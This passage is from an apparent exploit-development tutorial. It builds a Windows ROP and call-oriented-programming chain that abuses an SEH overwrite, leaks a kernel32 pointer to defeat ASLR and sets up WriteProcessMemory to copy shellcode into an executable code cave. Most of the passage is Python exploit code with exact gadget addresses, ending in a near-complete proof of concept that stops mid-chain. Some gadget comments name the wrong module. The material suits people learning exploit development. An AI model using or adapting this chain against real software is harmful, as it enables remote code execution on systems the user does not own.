State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would perform an add esp, X ; ret. Why add, esp X you may ask?

As you may, or may not, know - when a call instruction is executed - it pushes its return address onto the stack. This is done so the caller knows where to return after it is done executing. However, we can just execute an add esp X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack - meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the instruction into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can eventually use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended value of 0x180.

We used the ECX register, which currently still contains the address on the stack that holds the now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 12 (0xC) decimal bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

It should also be noted, that after each of these ROP gadgets are executed - the AL register will be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating the kernel32WriteProcessMemory parameter placeholder to point to the actual API.

Currently. ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we can utilize the EXACT same routine to increase it another 0x180 bytes - which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter placholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address, than kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
